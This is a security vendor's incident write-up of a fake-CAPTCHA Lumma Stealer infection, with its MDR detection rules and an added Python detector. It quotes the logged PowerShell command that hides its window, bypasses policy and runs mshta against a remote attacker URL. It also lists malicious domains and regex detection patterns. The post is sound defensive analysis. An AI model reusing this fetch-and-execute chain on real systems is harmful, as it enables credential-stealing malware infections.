Beyond EDR: Five MDR Rules Outrun EDR Silence

Our previous post, Beyond EDR: CYREBRO MDR Exposes the Unseen, covered how calm dashboards can hide active compromise. This post digs into one recent case: a single fake CAPTCHA launched a brand-new Lumma Stealer variant, and CYREBRO's MDR engine shut it down within eight minutes.
TL;DR
- A fake "I'm not a robot" CAPTCHA lured one employee into running mshta.exe with a remote payload.
- Five CYREBRO MDR rules covering hidden PowerShell, obfuscation, risky flag combinations, mshta abuse and Lumma IOCs fired within seconds while the native EDR remained silent.
- 130 events unfolded in 98 seconds before containment. Several file hashes still scored 0/71 on VirusTotal, confirming the malware was brand new.
- Rapid isolation, credential resets and a full rebuild prevented data loss. Updated playbooks now protect every CYREBRO customer.
From Quiet Console to Critical Alert
Why native EDR stayed silent
At 22:09 UTC a Windows 11 workstation launched a hidden PowerShell process. Because the binary was signed and the command line exceeded the EDR's default logging length, no alert was raised. Thirty-four seconds later CYREBRO's MDR layer generated a critical-severity incident, linking five separate rule hits into one storyline.
The five MDR rules that changed everything
| MDR rule | Why it mattered |
|---|---|
| Hidden Execution of PowerShell | Attacker kept the console out of sight |
| PowerShell Malicious Behavior | The -w 1 / -ep bypass / -nop trio, a classic in fileless attacks |
| PowerShell Script Obfuscation | Revealed the AES-encrypted payload builder |
| Malicious mshta Execution | Delivered the first stage from the fake CAPTCHA site |
| Lumma Stealer Behavior | Matched the brand-new sample despite 0/71 AV scores |
Chronology of an Attack: Fake CAPTCHA to Data Theft
Initial access via a fake CAPTCHA and mshta.exe
The user encountered a CAPTCHA page that loaded from https[:]//amacys[.]shop/sports.mp4. A mouse click fired mshta.exe against the same address, running the remote script without dropping a file to disk.
Hidden PowerShell with risky flag combinations
mshta.exe spawned two PowerShell sessions. The first, with the URL defanged and the backtick line continuations as logged:

```powershell
powershell.exe -w 1 -ep bypass -nop -C `
  "$l='https[:]//amacys[.]shop/sports.mp4';Invoke-CimMethod `
  -ClassName Win32_Process -MethodName Create `
  -Arguments @{CommandLine=('ms'+'hta'+'.exe '+$l)}"
```
A second block decrypted a 256-byte AES-encrypted string directly in memory, then disabled AMSI and tampered with Event Tracing for Windows (ETW) to hide its tracks.
Payload delivery and attempted exfiltration
The decrypted payload contacted mapped03[.]sportsspot-moviebuffs[.]com/zibaa01.tiff over TCP 443 and unpacked Lumma Stealer. Within 98 seconds the malware tried to enumerate browser data and schedule persistence, but the connection was cut because CYREBRO's automated playbooks had already isolated the host.
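To make the five rules in the table concrete, here is an added example (not CYREBRO's rule engine or any of its detection content) that re-implements them as simple checks over constructed Sysmon-style process-creation and network events mirroring the chronology, correlates the hits per host into one storyline, and then re-runs the checks on a truncated command line to show the blind spot described under "Why native EDR stayed silent". The event layout, the host name and event ids, the parent process of mshta.exe, and the choice to key the Lumma rule on the two domains named in this post are all assumptions for the demonstration; the second (AES-decrypting) PowerShell block is not reproduced because the post does not quote it.

```python
"""Added example, not CYREBRO's rule engine: minimal versions of the five
MDR rules from the table, run over constructed Sysmon-style events."""
import re

# Command line quoted in the post (backtick line continuations removed).
PS_CMD = ("powershell.exe -w 1 -ep bypass -nop -C \"$l='https://amacys.shop/sports.mp4';"
          "Invoke-CimMethod -ClassName Win32_Process -MethodName Create "
          "-Arguments @{CommandLine=('ms'+'hta'+'.exe '+$l)}\"")

# Constructed telemetry (not captured data). Host name, ids, paths and the
# parent of mshta.exe are assumptions made for this example.
EVENTS = [
    {"id": 1, "host": "WS-11", "type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://amacys.shop/sports.mp4"},
    {"id": 2, "host": "WS-11", "type": "process",
     "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": PS_CMD},
    {"id": 3, "host": "WS-11", "type": "network",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest": "mapped03.sportsspot-moviebuffs.com", "port": 443},
]

# Flag patterns accept PowerShell's abbreviated parameter names (-w/-win/-windowstyle, -ep/-exec ...).
HIDDEN = re.compile(r"-w(?:in(?:dowstyle)?)?\s+(?:1|h(?:idden)?)\b", re.I)
EP_BYPASS = re.compile(r"-e(?:p|x\w*)\s+bypass\b", re.I)
NO_PROFILE = re.compile(r"-no(?:p|profile)\b", re.I)
# Quoted-fragment concatenation ('ms'+'hta'), base64 decoding, char casting, in-memory AES.
OBFUSCATION = re.compile(r"'[^']*'\s*\+\s*'|FromBase64String|\[char\]|Cryptography\.Aes", re.I)
URL = re.compile(r"https?://([\w.-]+)", re.I)
# The two domains defanged in the post; assumption: the Lumma rule keys on them as IOCs.
IOC_DOMAINS = {"amacys.shop", "sportsspot-moviebuffs.com"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_ioc(host):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def evaluate_event(ev):
    """Return the set of rule names a single event triggers."""
    hits = set()
    if ev["type"] == "process":
        image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
        if image == "powershell.exe":
            if HIDDEN.search(cmd):
                hits.add("Hidden Execution of PowerShell")
            if HIDDEN.search(cmd) and EP_BYPASS.search(cmd) and NO_PROFILE.search(cmd):
                hits.add("PowerShell Malicious Behavior")  # hidden / bypass / no-profile trio
            if OBFUSCATION.search(cmd):
                hits.add("PowerShell Script Obfuscation")
        if (image == "mshta.exe" and URL.search(cmd)) or parent == "mshta.exe":
            hits.add("Malicious mshta Execution")  # remote HTA, or mshta acting as a parent
        m = URL.search(cmd)
        if m and is_ioc(m.group(1)):
            hits.add("Lumma Stealer Behavior")
    elif ev["type"] == "network" and is_ioc(ev["dest"]):
        hits.add("Lumma Stealer Behavior")
    return hits


def build_storylines(events):
    """Correlate rule hits per host into one storyline with a severity."""
    per_host = {}
    for ev in events:
        for rule in evaluate_event(ev):
            per_host.setdefault(ev["host"], {}).setdefault(rule, []).append(ev["id"])
    return {host: {"rules": set(rules), "hits": rules,
                   "severity": "critical" if len(rules) >= 3 else "high" if len(rules) == 2 else "low"}
            for host, rules in per_host.items()}


def truncate_cmdline(ev, limit):
    """Simulate a log pipeline that keeps only the first `limit` characters of a command line."""
    if ev["type"] != "process":
        return ev
    return {**ev, "cmdline": ev["cmdline"][:limit]}


if __name__ == "__main__":
    full = build_storylines(EVENTS)["WS-11"]
    print("WS-11", full["severity"], sorted(full["rules"]))
    short = build_storylines([truncate_cmdline(e, 128) for e in EVENTS])["WS-11"]
    print("rules lost at 128-char truncation:", sorted(full["rules"] - short["rules"]))
```

Run against the full events, all five rules fire on WS-11 and the storyline is critical. Cut the command line at 128 characters and the string-concatenation indicator disappears, so the obfuscation rule never fires; cut it at 40 and only the flag-based rules survive, which is the blind spot truncating pipelines create.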
How CYREBRO’s Centralized Security Operations Platform Turned Insight into Action
All endpoint telemetry funnels into CYREBRO’s SOC Platform and Security Data Lake. There, correlation logic linked every process, registry edit, DNS request and network call into one storyline.
Platform playbooks then:
- Isolated the workstation via EDR API
- Captured volatile memory for DFIR review
- Terminated and quarantined seven processes
- Alerted the security team by portal, email and phone
Total dwell time from initial click to containment: 8 minutes.
After that, our analysts took control of the case. They completed a full investigation, confirmed the threat was contained, and made sure no other systems were affected. The host was rebuilt, passwords reset, and the client was guided through every step of recovery.
Actionable Defenses for Blue Teams
- Train users to treat unexpected CAPTCHA pages with suspicion.
- Limit or block mshta.exe where business workflows do not require it.
- Alert on PowerShell sessions that run with a hidden window, especially when combined with -ep bypass and -nop.
- Keep full-length command lines in your log pipeline: truncation equals blind spots.
- Layer behavior- and IOC-driven MDR on top of reputation-based EDR to catch brand-new threats like this Lumma variant, which scored 0/71 across AV engines at the time of detection.
Conclusion
One fake CAPTCHA was all it took to bring a fresh Lumma variant inside the perimeter. Five MDR rules, a Security Data Lake and automated playbooks kept the incident to eight minutes of drama instead of days of silent data loss.
FAQ – How does Lumma Stealer evade EDR and how can MDR close the gap?
- If Lumma Stealer is known, why didn’t my EDR stop it?
Operators tweak file hashes daily and hide code behind encrypted PowerShell that trusted Windows utilities launch. Default EDR policies shorten or ignore those long commands to stay quick and quiet. CYREBRO’s MDR focuses on behavior and context, flagging hidden execution, risky flag clusters and brand-new IOCs before reputation feeds catch up.